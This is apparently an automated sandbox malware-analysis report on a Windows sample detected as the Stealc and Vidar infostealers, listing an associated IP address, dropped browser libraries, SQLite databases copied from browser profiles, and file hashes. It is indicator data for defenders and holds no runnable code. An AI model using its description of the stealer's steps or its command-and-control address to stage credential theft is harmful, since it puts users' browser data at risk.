	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEHIJDAFBKFHIDGCFBFCBAFIIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFCAA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFCGDAAKFHIDBFIDBKFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DGCFHIDAKECFHIEBFCGIJDBKJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHCGCAAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFCFHJDBKJKEBFHJEHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKEGIDGDGHCAAAAKKFCG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKJDGDHIDBGIECBGHJDBAAKJDH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947392755708471
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'849'856 bytes
MD5:	acf1dede1e9bb45ce49ac994c7a0bbdb
SHA1:	9c1a3741398d83ab65643f33e1d9dde128950e45
SHA256:	1c11dea3a27fa828a45aae7c2ed0e44e5d6bc7f696adc85a3d6a1eac1176dd1a
SHA512:	3b99e403313291d539ce741ebaa00b8dce7c92eefdf167c9d7ac6aa5ff426a575e2c4f42c0109a73c1c55d927c7276670d0d963001e67b20252f83f2d565120f
